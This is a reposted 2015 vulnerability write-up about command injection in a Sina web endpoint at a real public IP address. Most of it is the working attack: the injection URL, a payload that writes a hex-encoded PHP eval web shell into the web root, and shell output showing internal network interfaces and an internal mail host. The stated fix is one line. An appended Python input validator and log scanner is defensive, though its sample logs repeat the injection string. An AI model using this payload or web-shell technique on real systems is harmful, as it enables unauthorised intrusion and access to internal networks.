
Code execution at a Sina endpoint: getshell straight into the internal network

2015-12-11 02:30

 

http://61.135.152.231/webtrans/index.php?controller=user&action=login
 




http://61.135.152.231/SetTime/index.php?time=%27set%7cset%26set%27
 




Code execution is present at the set location
 




pwd

Writing the shell


61.135.152.231//SetTime/index.php?time='set;echo+3C3F706870206576616C28245F504F53545B635D293B3F3E|xxd+-r+-ps+>/var/www/webbak/template/1.php;ls+'



http://61.135.152.231/webbak/template/1.php c


[/var/www/webbak/template/]$ /sbin/ifconfig
eth0 Link encap:Ethernet HWaddr 0c:c4:7a:08:7c:7c
inet addr:61.135.152.231 Bcast:61.135.152.255 Mask:255.255.255.224
inet6 addr: fe80::ec4:7aff:fe08:7c7c/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:5017795 errors:0 dropped:0 overruns:0 frame:0
TX packets:2704480 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:1182610202 (1.1 GB) TX bytes:326898975 (326.8 MB)
Memory:f7200000-f7280000

eth1 Link encap:Ethernet HWaddr 0c:c4:7a:08:7c:7d
inet addr:192.168.1.145 Bcast:192.168.1.255 Mask:255.255.255.0
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Memory:f7100000-f7180000

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:680777 errors:0 dropped:0 overruns:0 frame:0
TX packets:680777 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:756699997 (756.6 MB) TX bytes:756699997 (756.6 MB)



[/var/www/webbak/template/]$ ping -c 1 mail.staff.sina.com.cn
PING mail.staff.sina.com.cn (10.210.97.18) 56(84) bytes of data.
64 bytes from bogon (10.210.97.18): icmp_req=1 ttl=252 time=0.113 ms

--- mail.staff.sina.com.cn ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.113/0.113/0.113/0.000 ms


[/var/www/webbak/template/]$


 

Solution:

Filter the input.
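
One way to apply that filter as an allow-list, and to review access logs for earlier requests that would have failed it. This is an added example, not code from the original post or from the affected site. It assumes the time parameter is meant to carry a "YYYY-MM-DD HH:MM:SS" value and that logs are in Apache-style format; the log lines are constructed samples.

```python
import re
from datetime import datetime
from urllib.parse import parse_qs

# Assumption: a legitimate `time` value looks like "2015-12-11 02:30:00".
TIME_RE = re.compile(r"\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}", re.ASCII)
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def is_valid_time(value):
    """Allow-list filter: exact format and a real calendar date, nothing else."""
    if not TIME_RE.fullmatch(value):
        return False
    try:
        datetime.strptime(value, "%Y-%m-%d %H:%M:%S")
    except ValueError:
        return False
    return True

def rejected_requests(log_lines, path="/SetTime/index.php"):
    """Return (line_no, decoded value) for each `time` value the filter rejects."""
    hits = []
    for line_no, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        # Split by hand: urlsplit() would read a leading "//SetTime" as a host.
        raw_path, _, query = match.group(1).partition("?")
        if re.sub(r"/+", "/", raw_path) != path:
            continue
        # parse_qs splits on "&" before decoding, so an encoded %26 stays in the value.
        for value in parse_qs(query, keep_blank_values=True).get("time", []):
            if not is_valid_time(value):
                hits.append((line_no, value))
    return hits

# Constructed sample log lines (client addresses are documentation ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Dec/2015:02:10:01 +0800] "GET /SetTime/index.php?time=2015-12-11+02:10:00 HTTP/1.1" 200 12',
    '192.0.2.77 - - [11/Dec/2015:02:11:40 +0800] "GET /SetTime/index.php?time=%27set%7cset%26set%27 HTTP/1.1" 200 2048',
    '192.0.2.77 - - [11/Dec/2015:02:12:05 +0800] "GET //SetTime/index.php?time=2015-02-30+00:00:00 HTTP/1.1" 200 12',
    '192.0.2.10 - - [11/Dec/2015:02:13:00 +0800] "GET /webtrans/index.php?controller=user&action=login HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for line_no, value in rejected_requests(SAMPLE_LOG):
        print(f"line {line_no}: rejected time value {value!r}")
```

The same is_valid_time check belongs in the request handler itself, before the value reaches any command, so that anything outside the expected format is refused rather than escaped.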


Source: www.2cto.com/Article/201512/453014.html
